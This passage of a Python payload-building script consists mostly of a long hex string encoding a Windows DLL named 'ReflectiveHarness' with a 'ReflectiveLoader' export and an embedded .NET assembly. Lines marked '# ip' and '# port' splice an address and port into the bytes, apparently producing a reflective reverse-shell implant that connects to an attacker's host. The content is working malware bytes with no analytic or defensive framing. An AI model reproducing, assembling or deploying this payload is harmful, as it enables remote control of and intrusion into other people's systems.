00005f1f0000010000005f1f0000410000000104010004820000010000000106020006720230110a02000a3206303055000001000000d92300000024000068ed000000000000091a06001a3411001a9216e01470136030550000010000000d250000d92500008eed0000dd25000011190a0019740a001964090019340800193215f013e011c03055000001000000562600001c270000d7ed000000000000010f06000f6407000f3406000f320b7001120800125409001234080012320ee00c700b60192203001101b600025000004c750000a00500000918020018b214303055000001000000a72b0000c72b0000ebed0000c72b00000106020006720250011d0c001d740b001d640a001d5409001d3408001d3219f017e015c001160a0016540c0016340b00163212f010e00ec00c700b60010f06000f640c000f340b000f720b700114080014640c0014540b0014340a0014721070000000000104010004120000011206001274100012340f0012b20b50010000000109010009620000192f09001e74bb001e64ba001e34b9001e01b600105000004c750000a00500000114080014640a0014540900143408001452107001140600146407001434060014321070111304001334070013320f703055000002000000d83b0000053c000031ee000000000000173c00004e3c00004aee000000000000110a04000a3406000a3206703055000002000000b73d0000c13d000031ee000000000000d63d0000fd3d00004aee0000000000000114080014640800145407001434060014321070111c0a001c640f001c340e001c7218f016e014d012c010703055000001000000674200007b43000063ee00000000000011200d0020c41f0020741e0020641d0020341c002001180019f017e015d0000030550000020000002c4400005f44000087ee00000000000068440000fb46000087ee000000000000010f06000f640b000f340a000f520b70010d04000d3409000d3206500106020006320230010a04000a340d000a72067001080400087204700360023001190a0019740900196408001954070019340600193215e0010a04000a3406000a320670011c0c001c6410001c540f001c340e001c7218f016e014d012c01070192d0b001b6451001b5450001b344f001b014a0014f012e0107000004c75000040020000000000000100000019130900130112000cf00ae008d006c0047003600230000030550000020000005e6d0000836d0000a2ee0000836d00005e6d0000fe6d000096ef0000000000000107030007420350023000001922080022521ef01ce01ad018c016701560143030550000020000005f6f0000f66f00002cf00000f66f0000276f00001d70000042f000000000000001210b0021341f002101160015f013e011d00fc00d700c600b50000001170a001754120017341000179213f011e00fc00d700c6009150800157408001564070015340600153211e03055000001000000a46900000e6a0000010000000e6a000001190a001934170019d215f013e011d00fc00d700c600b50090d01000d4200003055000001000000f15f00000260000014f0000004600000011c0c001c640c001c540b001c340a001c3218f016e014d012c0107001180a0018640e0018540d0018340c00187214e012c0107009190a0019740c0019640b0019340a00195215f013e011d03055000001000000ba6a0000556c000001000000596c00000904010004420000305500000100000021750000257500000100000025750000090401000442000030550000010000000275000006750000010000000675000001000000110602000652023030550000010000005c760000a47600006bf000000000000001140800146406001454050014340400141210700106020006520230011d0c001d7411001d6410001d540f001d340e001d9219f017e015d0191b06000c01110005700460035002304c75000070000000011c0c001c6412001c5411001c3410001c9218f016e014d012c0107001190a0019740d0019640c0019540b0019340a00197215e01918050009e2057004600350023000004c75000060000000191d06000ef207e005700460035002304c750000700000000100000011100600107407001034060010320ce03055000001000000de8700000188000084f0000000000000010602000632025011060200063202303055000001000000a78b0000bd8b0000a1f0000000000000110a04000a3407000a32067030550000010000009e8f0000f58f0000baf000000000000011190a0019e40b0019740a001964090019340800195215f03055000001000000579100000e920000baf000000000000019250a001654110016341000167212f010e00ec00c700b604c75000038000000192b07001a74b4001a34b3001a01b0000b5000004c75000070050000090a04000a3406000a32067030550000010000006d950000a0950000e0f00000a095000011170a0017640f0017340e00175213f011e00fd00dc00b70305500000100000058970000df97000000f10000000000000107020007019b00010000000100000001000000010f06000f640b000f340a000f720b70191e08000f920bf009e007c005700460035002304c7500004800000001040100044200000112060012e413001274110012d20b500104010004220000191c04000d3414000df206704c75000078000000191a04000bf20470036002304c75000078000000191f06001101110005700460033002504c750000700000000105020005340100010e02000e320a30010a02000a320630010f06000f6411000f3410000fd20b70192d0d451f7412001b6411001734100013430e920af008e006d004c0025000004c75000048000000010f06000f640f000f340e000fb20b70192d0d351f7410001b640f0017340e0013330e720af008e006d004c0025000004c750000300000000110060010640d0010340c0010920c7011190a0019740c0019640b0019340a00195215f013e011d03055000002000000b0b60000f4b600001ef10000000000007db600000db7000046f1000000000000110f06000f6409000f3408000f520b70305500000100000056b70000c8b700005ff1000000000000011006001064110010b209e00770065011060200063202703055000001000000e1b80000f7b80000a1f0000000000000192d0c001f7415001f6414001f3412001fb218f016e014d012c010504c75000058000000192a0b001c341e001c01140010f00ee00cd00ac008700760065000004c75000098000000192a0b001c3421001c01180010f00ee00cd00ac008700760065000004c750000b00000001111060011340a0011320de00b700a603055000001000000a7d80000ebd80000c0f10000000000001115080015340b00153211f00fe00dc00b700a6030550000010000008ed90000c1d9000078f100000000000019360b00253473032501680310f00ee00cd00ac008700760065000004c750000301b0000110f04000f3407000f320b703055000001000000b3e20000bde200008ff10000000000000100000001180a00186408001854070018340600181214e012c0107001100600107407001034060010320ce011150800157408001564070015340600153211f030550000010000001fe600003ee60000a7f100000000000001190a0019740f0019640e0019540d0019340c00199215e01111060011340a0011320de00b700a60305500000100000077ea00009bea0000c0f100000000000000000000702000000000000060740100000000000000000000000000000000000100000070740100000000000000000000000000e0d9010000000000ffffffff000000002000000030200000000000000000000000000000000000007822000000000000b87401000000000000000000000000000000000002000000d0740100f87401000000000000000000000000001000000008da010000000000ffffffff0000000018000000542200000000000000000000000000000000000030da010000000000ffffffff0000000018000000c8370000000000000000000000000000000000004c6000000000000040750100000000000000000000000000000000000200000058750100f87401000000000000000000000000000000000078da010000000000ffffffff00000000180000002860000000000000000000000000000000000000abefc35500000000b2750100010000000100000001000000a8750100ac750100b0750100c0190000c875010000005265666c6563746976654861726e6573732e646c6c005265666c6563746976654c6f6164657200000000307601000000000000000000e678010000000100587801000000000000000000f478010028020100b078010000000000000000001679010080020100000000000000000000000000000000000000000000000000c078010000000000d678010000000000d47d010000000000c67d010000000000b67d010000000000a27d010000000000927d010000000000807d010000000000707d0100000000005c7d0100000000004c7d010000000000227901000000000032790100000000003e7901000000000054790100000000006a79010000000000767901000000000088790100000000009e79010000000000ae79010000000000be79010000000000ca79010000000000d679010000000000f079010000000000fe79010000000000127a010000000000247a010000000000387a010000000000547a010000000000647a010000000000727a010000000000887a0100000000009a7a010000000000ac7a010000000000bc7a010000000000ca7a010000000000e27a010000000000f47a0100000000000a7b010000000000247b0100000000003a7b010000000000547b0100000000006e7b010000000000887b0100000000009c7b010000000000b07b010000000000cc7b010000000000ea7b010000000000127c0100000000001a7c0100000000002e7c010000000000427c0100000000004e7c0100000000005c7c0100000000006a7c010000000000747c010000000000887c010000000000947c010000000000a07c010000000000b67c010000000000ce7c010000000000e67c010000000000f87c010000000000027d0100000000000e7d0100000000001a7d0100000000002c7d0100000000003a7d0100000000000000000000000000160000000000008006000000000000801a00000000000080150000000000008008000000000000800f0000000000008010000000000000809b0100000000008009000000000000800200000000000080000000000000000002790100000000000000000000000000fd034f75747075744465627567537472696e67570000e70043726561746554687265616400004b45524e454c33322e646c6c00004f4c4541555433322e646c6c00000000434c52437265617465496e7374616e6365006d73636f7265652e646c6c0056024765744c6173744572726f7200001e066c7374726c656e410000d4034d756c746942797465546f576964654368617200dd055769646543686172546f4d756c74694279746500b5034c6f63616c4672656500ce01476574436f6d6d616e644c696e654100140247657443757272656e74546872656164496400002501456e636f6465506f696e74657200ff004465636f6465506f696e746572003c0348656170467265650000380348656170416c6c6f6300b50452746c4c6f6f6b757046756e6374696f6e456e7472790000bb0452746c556e77696e64457800b70452746c5063546f46696c654865616465720044045261697365457863657074696f6e00006a034973446562756767657250726573656e74007003497350726f636573736f724665617475726550726573656e740019055365744c6173744572726f72000057014578697450726f63657373006c024765744d6f64756c6548616e646c654578570000a40247657450726f63416464726573730000a90247657450726f63657373486561700000c70247657453746448616e646c650000450247657446696c655479706500060144656c657465437269746963616c53656374696f6e00c50247657453746172747570496e666f570068024765744d6f64756c6546696c654e616d6541000030045175657279506572666f726d616e6365436f756e74657200100247657443757272656e7450726f63657373496400dd0247657453797374656d54696d65417346696c6554696d65002e02476574456e7669726f6e6d656e74537472696e6773570000a30146726565456e7669726f6e6d656e74537472696e67735700ae0452746c43617074757265436f6e7465787400bc0452746c5669727475616c556e77696e6400009205556e68616e646c6564457863657074696f6e46696c74657200005205536574556e68616e646c6564457863657074696f6e46696c746572005103496e697469616c697a65437269746963616c53656374696f6e416e645370696e436f756e74006105536c656570000f0247657443757272656e7450726f636573730070055465726d696e61746550726f6365737300008205546c73416c6c6f6300008405546c7347657456616c7565008505546c7353657456616c7565008305546c7346726565006d024765744d6f64756c6548616e646c6557000041034865617053697a650000f105577269746546696c650069024765744d6f64756c6546696c654e616d655700002901456e746572437269746963616c53656374696f6e0000a5034c65617665437269746963616c53656374696f6e00007503497356616c6964436f64655061676500aa0147657441435000008d024765744f454d43500000b9014765744350496e666f00aa034c6f61644c69627261727945785700003f03486561705265416c6c6f6300cc02476574537472696e675479706557000099034c434d6170537472696e675700009801466c75736846696c65427566666572730000e201476574436f6e736f6c6543500000f401476574436f6e736f6c654d6f64650000300553657453746448616e646c6500000c0553657446696c65506f696e74657245780000f0055772697465436f6e736f6c6557007f00436c6f736548616e646c6500c20043726561746546696c6557000000000000000000000000000000000000000000000000000000000000000a0000000000000004000280000000000000000000000000102100800100000032a2df2d992b0000cd5d20d266d4ffff759800007398000000000000000000000100000016000000020000000200000003000000020000000400000018000000050000000d0000000600000009000000070000000c000000080000000c000000090000000c0000000a000000070000000b000000080000000c000000160000000d000000160000000f00000002000000100000000d00000011000000120000001200000002000000210000000d0000003500000002000000410000000d00000043000000020000005000000011000000520000000d000000530000000d0000005700000016000000590000000b0000006c0000000d0000006d00000020000000700000001c00000072000000090000000600000016000000800000000a000000810000000a00000082000000090000008300000016000000840000000d00000091000000290000009e0000000d000000a100000002000000a40000000b000000a70000000d000000b700000011000000ce00000002000000d70000000b000000180700000c0000000c00000008000000ffffffff000000000000000000000000ffffffffffffffff800a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000100000002000000000000000000000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a800800100000058a8008001000000000000000000000001000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000010000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000010000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000100000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000004300000000000000000000009014018001000000941401800100000098140180010000009c14018001000000a014018001000000a414018001000000a814018001000000ac14018001000000b414018001000000c014018001000000c814018001000000d814018001000000e414018001000000f014018001000000fc140180010000000015018001000000041501800100000008150180010000000c150180010000001015018001000000141501800100000018150180010000001c150180010000002015018001000000241501800100000028150180010000003015018001000000381501800100000044150180010000004c150180010000000c1501800100000054150180010000005c1501800100000064150180010000007015018001000000801501800100000088150180010000009815018001000000a415018001000000a815018001000000b015018001000000c015018001000000d8150180010000000100000000000000e815018001000000f015018001000000f81501800100000000160180010000000816018001000000101601800100000018160180010000002016018001000000301601800100000040160180010000005016018001000000681601800100000080160180010000009016018001000000a816018001000000b016018001000000b816018001000000c016018001000000c816018001000000d016018001000000d816018001000000e016018001000000e816018001000000f016018001000000f81601800100000000170180010000000817018001000000181701800100000030170180010000004017018001000000c81601800100000050170180010000006017018001000000701701800100000080170180010000009817018001000000a817018001000000c017018001000000d417018001000000dc17018001000000e817018001000000001801800100000028180180010000004018018001000000a08701800100000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000000000000000000c484018001000000000000000000000000000000000000000100000001000000000000000000000000000000000000000000000000000000109201800100000000000000000000000000000000000000a0230180010000003028018001000000b029018001000000d0840180010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010101010101010101010101010101010101010101010101000000000000020202020202020202020202020202020202020202020202020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006162636465666768696a6b6c6d6e6f707172737475767778797a0000000000004142434445464748494a4b4c4d4e4f505152535455565758595a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010101010101010101010101010101010101010101010101000000000000020202020202020202020202020202020202020202020202020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006162636465666768696a6b6c6d6e6f707172737475767778797a0000000000004142434445464748494a4b4c4d4e4f505152535455565758595a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000102040800000000a4030000608279822100000000000000a6df000000000000a1a5000000000000819fe0fc00000000407e80fc00000000a8030000c1a3daa320000000000000000000000000000000000000000000000081fe00000000000040fe000000000000b5030000c1a3daa320000000000000000000000000000000000000000000000081fe00000000000041fe000000000000b6030000cfa2e4a21a00e5a2e8a25b000000000000000000000000000000000081fe000000000000407ea1fe000000005105000051da5eda20005fda6ada32000000000000000000000000000000000081d3d8dee0f90000317e81fe00000000108b0180010000000000000000000000c0ed0180010000000000000000000000c0ed01800100000001010000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000002000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000feffffff0000000000000000a89201800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed0180010000007f7f7f7f7f7f7f7fac9201800100000078ed01800100000078ed01800100000078ed01800100000078ed01800100000078ed01800100000078ed01800100000078ed0180010000002e0000002e0000001092018001000000a023018001000000a225018001000000a4250180010000000004000001fcffff350000000b00000040000000ff0300008000000081ffffff1800000008000000200000007f000000000000000000000000a00240000000000000000000c80540000000000000000000fa08400000000000000000409c0c40000000000000000050c30f40000000000000000024f412400000000000000080969816400000000000000020bcbe1940000000000004bfc91b8e3440000000a1edccce1bc2d34e4020f09eb5702ba8adc59d6940d05dfd25e51a8e4f19eb83407196d795430e058d29af9e40f9bfa044ed81128f8182b940bf3cd5a6cfff491f78c2d3406fc6e08ce980c947ba93a841bc856b5527398df770e07c42bcdd8edef99dfbeb7eaa5143a1e676e3ccf2292f84812644281017aaf8ae10e3c5c4fa44eba7d4f3f7ebe14a7a95cf4565ccc7910ea6aea019e3a3460d65170c7581867576c9484d5842e4a793393b35b8b2ed534da7e55d3dc55d3b8b9e925aff5da6f0a120c054a58c3761d1fd8b5a8bd8255d89f9db67aa95f8f327bfa2c85ddd806e4cc99b97208a025260c4257500000000cdcccdccccccccccccccfb3f713d0ad7a3703d0ad7a3f83f5a643bdf4f8d976e1283f53fc3d32c6519e25817b7d1f13fd00f2384471b47acc5a7ee3f40a6b6696caf05bd3786eb3f333dbc427ae5d594bfd6e73fc2fdfdce61841177ccabe43f2f4c5be14dc4be9495e6c93f92c4533b7544cd14be9aaf3fde67ba943945ad1eb1cf943f2423c6e2bcba3b31618b7a3f615559c17eb1537c12bb5f3fd7ee2f8d06be928515fb443f243fa5e939a527ea7fa82a3f7daca1e4bc647c46d0dd553e637b06cc23547783ff91813d91fa3a197a63254331c0ac3c2189d138824797b800fdd73bdc8858081bb1e8e386a6033bc684454207b6997537db2e3a33711cd223db32ee49905a39a687bec057daa582a6a2b532e268b211a7529f4459b7102c2549e42d36344f53aece6b258f5904a4c0dec27dfbe8c61e9ee7885a57913cbf508322184e4b6562fd838faf06947d11e42dde9fced2c804dda6d80a00000000feffffffffffffff0000000000000000000000000000f07f00000000000000004d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500006486020081eec3550000000000000000f00022200b020b00003e000000040000000000000000000000200000000000800100000000200000000200000400000000000000040000000000000000800000000200000000000003004085000040000000000000400000000000000000100000000000002000000000000000000000100000000000000000000000000000000000000000600000d802000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000004800000000000000000000002e74657874000000e43c000000200000003e000000020000000000000000000000000000200000602e72737263000000d8020000006000000004000000400000000000000000000000000000400000402e72656c6f63000000000000008000000000000000440000000000000000000000000000400000424800000002000500802f0000642d00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003300300650000000000000002177d0300000402281000000a0000020273120000067d0600000402281100000a7d09000004027b09000004146f1200000a0002027b06000004027b09000004281300000a7d07000004027b07000004196f1400000a00027b070000046f1500000a00002a000000133001000c0000000100001100027b040000040a2b00062a260002037d040000042a0000133001000c0000000200001100027b050000040a2b00062a260002037d050000042a00001330010018000000030000110073010000060a066f070000060072010000700b2b00072a1b300400ef02000004000011001f5e0a72050000700b720f0000700c721b0000700d1613041613057223000070130772230000701308020228080000067d0200000402027b020000046f1600000a7d0100000402281700000a25130a7d08000004110a130b00386502000000027b010000046f1800000a16fe01130c110c3a4c02000000027b020000046f1900000a8d320000011306380202000000110416fe01130c110c2d5d00281a00000a11061611096f1b00000a6f1c00000a13081108068c3500000109281d00000a281e00000a16fe01130c110c2d1700021107280c0000060016130472230000701307002b0d0011071108281f00000a13070000384b010000110516fe01130c110c3a8b00000000281a00000a11061611096f1b00000a6f1c00000a130811086f2000000a08281e00000a16fe01130c110c2d4400021107280a00000616fe01130c110c2d0d00021107280c00000600002b1800027b060000046f2100000a72250000706f2200000a000072230000701307161305002b140011071108281f00000a130772230000701308000038b200000000281a00000a11061611096f1b00000a6f1c00000a130711076f2000000a727d000070281e00000a2d1611076f2000000a7287000070281e00000a16fe012b011600130c110c2d0538d700000011076f2000000a07281e00000a16fe01130c110c2d0c00171305722300007013070011077223000070282300000a2c0411052b011700130c110c2d28001107166f2400000a06fe0116fe01130c110c2d1200021107280b00000600722300007013070000001105130c110c2d4500021107280a00000616fe01130c110c2d1700021107280c0000060072230000701307161304002b1b00171304027b060000046f2100000a72910000706f2500000a00000000027b0100000411061611068e696f2600000a25130916fe0116fe01130c110c3adafdffff027b020000046f2700000a002b130002280200000616fe01130c110c3a89fdffff00de14110b14fe01130c110c2d08110b6f2800000a00dc002a00411c0000020000005900000080020000d90200001400000000000000"
raw_code += "".join(ip_hex) # ip
raw_code += "1b300300460000000500001100732900000a0a001a8d3200000125d019000004282b00000a0b07732c00000a0c060820"
raw_code += "".join(port_hex) # port
raw_code += "00006f2d00000a0000de0c0d0017282e00000a0000de00000613042b0011042a000001100000000007002a31000c3d0000011b3002004c00000006000011001a8d32000001130611060a06732c00000a0b0720401f0000732f00000a0c086f3000000a00140d00086f3100000a0d091305de1313040017282e00000a0000de00000913052b000011052a01100000000028000d35000d3d000001133002002b0000000700001100733200000a0a031200283300000a0b066f3400000a16fe0216fe010d092d0500160c2b04170c2b00082a001330040092000000080000110072230000700a0317036f3500000a17596f3600000a1001036f2000000a100103178d350000010c08161f209d086f3700000a0b07169a0d092c3a097299000070281e00000a2d0f0972b5000070281e00000a2d112b1e02177d0300000472d30000700a2b0f02167d0300000472fd0000700a2b00027b060000046f2100000a06722b010070281f00000a6f2500000a002a0000133004006e010000090000110003283800000a0d093a0d01000000027b08000004036f3900000a26027b0300000416fe010d092d1300027b0800000472310100706f3a00000a2600733b00000a0a0602fe060d000006733c00000a6f3d00000a00027b080000046f3e00000a6f3f00000a02fe060e000006733c00000a6f4000000a00027b080000046f3e00000a6f4100000a02fe060f000006733c00000a6f4200000a00027b080000046f3e00000a6f4300000a02fe0610000006733c00000a6f4400000a00027b080000046f3e00000a6f4500000a02fe0611000006733c00000a6f4600000a00027b080000046f4700000a6f4800000a166f4900000a18176f4a00000a00027b0800000414066f0100002b0b2b020000076f4c00000a16fe010d092df100027b080000046f4d00000a6f4e00000a6f4f00000a6f5000000a6f5100000a0c027b060000046f2100000a724701007008724f010070285200000a6f2500000a00027b080000046f4700000a6f5300000a002a00001b3002005b0000000a0000110003740200001b0a066f5400000a0b00076f5500000a0d2b20096f5600000a0c00027b060000046f2100000a086f5100000a6f2200000a0000096f5700000a130411042dd4de120914fe01130411042d07096f2800000a00dc002a00011000000200170030470012000000001b300300780000000b0000110000027b080000046f3e00000a6f3f00000a6f5800000a0b2b2a076f5900000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f5a00000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f3f00000a6f5b00000a002a011000000200180038500010000000001b300300780000000c0000110000027b080000046f3e00000a6f4100000a6f5c00000a0b2b2a076f5d00000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f5e00000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f4100000a6f5f00000a002a011000000200180038500010000000001b300300780000000d0000110000027b080000046f3e00000a6f4300000a6f6000000a0b2b2a076f6100000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f6200000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f4300000a6f6300000a002a011000000200180038500010000000001b300300780000000e0000110000027b080000046f3e00000a6f4500000a6f6400000a0b2b2a076f6500000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f6600000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f4500000a6f6700000a002a01100000020018003850001000000000a202286800000a7d0b00000402286900000a000002037d0a0000040203731e0000067d0c000004002a000000133001000c0000000f00001100027b0b0000040a2b00062a133001000b000000100000110072010000700a2b00062a00133002000d00000011000011001716736a00000a0a2b00062a000000133001000c0000001200001100027b0c0000040a2b00062a13300100100000001300001100286b00000a6f6c00000a0a2b00062a13300100100000001300001100286b00000a6f6d00000a0a2b00062a32007255010070736e00000a7a320072ce020070736e00000a7a12002b002a12002b002a7a00027b0a000004176f0300000600027b0a000004036f05000006002b002a7202734b0000067d0e00000402286f00000a000002037d0d000004002a13300400420000001400001100027b0d0000047b010000046f7000000a16fe010b072d2900287100000a036f5100000a6f7200000a0a027b0d0000047b010000040616068e696f7300000a00002a3a00027245040070281f000006002a2a000203281f000006002a520002057245040070281f00000a281f000006002a2a000205281f000006002a2a000203281f000006002a520002724904007003281f00000a281f000006002a520002725904007003281f00000a281f000006002a520002726904007003281f00000a281f000006002a520002727d04007003281f00000a281f000006002a12002b002a133001000b000000100000110072010000700a2b00062a32007291040070736e00000a7a320072cf040070736e00000a7a3200721f050070736e00000a7a32007279050070736e00000a7a00133001000c0000001500001100027b0e0000040a2b00062a320072d3050070736e00000a7a3200720d060070736e00000a7a0000133001000c0000001600001100027b130000040a2b00062a260002037d130000042a0000133001000c0000001700001100027b160000040a2b00062a260002037d160000042a0000133001000c0000001800001100027b100000040a2b00062a260002037d100000042a0000133001000c0000000200001100027b110000040a2b00062a260002037d110000042a32007263060070736e00000a7a00133001000c0000001600001100027b120000040a2b00062a260002037d120000042a320072ad060070736e00000a7a320072f9060070736e00000a7a133001000c0000001700001100027b140000040a2b00062a133001000c0000001700001100027b150000040a2b00062a3200723b070070736e00000a7a32007273070070736e00000a7a320072c3070070736e00000a7a3200720f080070736e00000a7a133001000c0000001800001100027b170000040a2b00062a260002037d170000042a0000133001000c0000001700001100027b0f0000040a2b00062a260002037d0f0000042a0000133001000c0000001000001100027b180000040a2b00062a260002037d180000042a0000133003000201000019000011021200fe151900000112001f78287400000a0012001f64287500000a00067d0f000004021201fe151a000001120116287600000a00120116287700000a00077d1000000402177d11000004021f0f7d1200000402167d13000004021202fe1519000001120220ffffff7f287400000a00120220ffffff7f287500000a00087d14000004021203fe151900000112031f64287400000a0012031f64287500000a00097d15000004021204fe151900000112041f64287400000a00120420e8030000287500000a0011047d16000004021205fe151a000001120516287600000a00120516287700000a0011057d170000040272230000707d1800000402287800000a002a000042534a4201000100000000000c00000076342e302e33303331390000000005006c000000540e0000237e0000c00e0000ec10000023537472696e677300000000ac1f00005c0800002355530008280000100000002347554944000000182800004c05000023426c6f6200000000000000020000015715a229090a000000fa253300160000010000005800000006000000190000004b00000045000000780000000e0000001900000004000000150000001f0000000e000000010000000100000004000000030000000100000000000a00010000000000060073006c000a00b90097000a00c00097000a00d40097000e00fe00eb000e001301eb000a006b0144010a007f017a000a008d0144010a0028027a000600ae026c000600d7026c0006000703f2020600e7036c000a003a047a0006007d0462040a008a047a000600b20493040a00bf0497000a00d70497000a00f9047a000a0006057a000a0018057a000600650555050a00960597000a00a70597000a00030797000a000e0797000a00670797000a006f0797000600b7099d090600e209d0090600f909d0090600160ad0090600350ad00906004e0ad0090600670ad0090600820ad00906009d0ad0090600d50ab60a0600e90ab60a0600f70ad0090600100bd00906004d0b2d0b06006d0b2d0b0a00990b7a000a00c70b44010a00e60b44010600280c1e0c0600510c6c000600620c560c06007f0c6c0006008b0c6c000600ce0c6c000600270d2d0b0600560d2d0b0600650d6c0006006b0d6c000e00990d8e0d0600ab0d6c000600bc0d6c000e00c60deb000a00e80d7a000a00f50d7a001200b20493040a00fe0d7a000a00570e7a0006006a0e6c0012006a0e6c000a00870e7a000a00a10e7a000a00b70e7a000a00d10e7a000a00eb0e7a000a00010f7a000a00180f44010a002a0f44010a003b0f440112005e0f6c0006005e0f6c000a00940f44010a00bc0f7a000a00d40f7a0006001210620406004d103a1012001210620406007b106a10060094106c0000000000010000000000010001000100100016001600050001000100030010001e00000009000a001200030010002b0000000d000d001e00030010004500000011000f00320000000000e20c0000050019004c0006000c01130001001d011700010024011b0001002b011b00010036011e0001003f01210001007401250001008a0129000100a1012d000100a6026a000100b3026e000100bb0272000100a6026a000100cb03ac0001009b0504010100b30508010100c3051e000100cf050c010100e0050c010100f10504010100080604010100170604010100230608010100330610011301420d1e005020000000008118a70131000100c420000000008608ad0135000100dc20000000008608bc0139000100e820000000008608cb013e0002000021000000008608d801420002000c21000000009600e501470003003021000000008100ee01310004004c24000000008100f2014c000400b024000000008100ff014c00040018250000000081000902510004005025000000008100110256000500f0250000000081001e02560006006c270000000081003b025b000700e4270000000081004e025b00090078280000000081005e025b000b000c2900000000810070025b000d00a02900000000810082025b000f00342a000000008618a70176001100602a00000000c608bf027c001200782a00000000c608ce0281001200902a00000000c608df0285001200ac2a00000000c608eb028a001200c42a00000000c60813038f001200e02a00000000c60826038f001200fc2a00000000c6003b0331001200092b00000000c6004d0331001200162b00000000c6005e03310012001b2b00000000c600750331001200202b00000000c6008a03420012003f2b000000008618a701760013005c2b000000008100d20356001400aa2b00000000c600dd0331001500b92b00000000c600dd0356001500c42b00000000c600dd03b0001600d92b00000000c600f403b0001900e42b00000000c600f40356001c00ef2b00000000c600fa0356001d00042c00000000c600090456001e00192c00000000c600180456001f002e2c00000000c600290456002000432c00000000c6004904b9002100482c0000000086085704810023005f2c00000000c600d004c00023006c2c00000000c600e904d2002600792c00000000c6002e05df002a00862c00000000c6002e05ec003000942c00000000c6084205f5003400ac2c00000000c6004c0581003400b92c00000000c6007205fa003400c82c00000000c608400613013400e02c00000000c608540618013400ec2c00000000c60868061e013500042d00000000c608770623013500102d00000000c608860629013600282d00000000c60899062e013600342d00000000c608ac063e0037004c2d00000000c608bb0642003700562d00000000c600ca0631003800642d00000000c608db06130138007c2d00000000c608ef0618013800862d00000000c600180734013900932d00000000c6082a0735003a00a02d00000000c6083b071e013a00b82d00000000c60855071e013a00d02d00000000c6007e0741013a00dd2d00000000c600860748013b00ea2d00000000c6009b0754013f00f72d00000000c6009b075c014100042e00000000c608ad07290143001c2e00000000c608c0072e014300282e00000000c608d3071e014400402e00000000c608e207230144004c2e00000000c608f10781004500642e00000000c608010856004500702e000000008618a7013100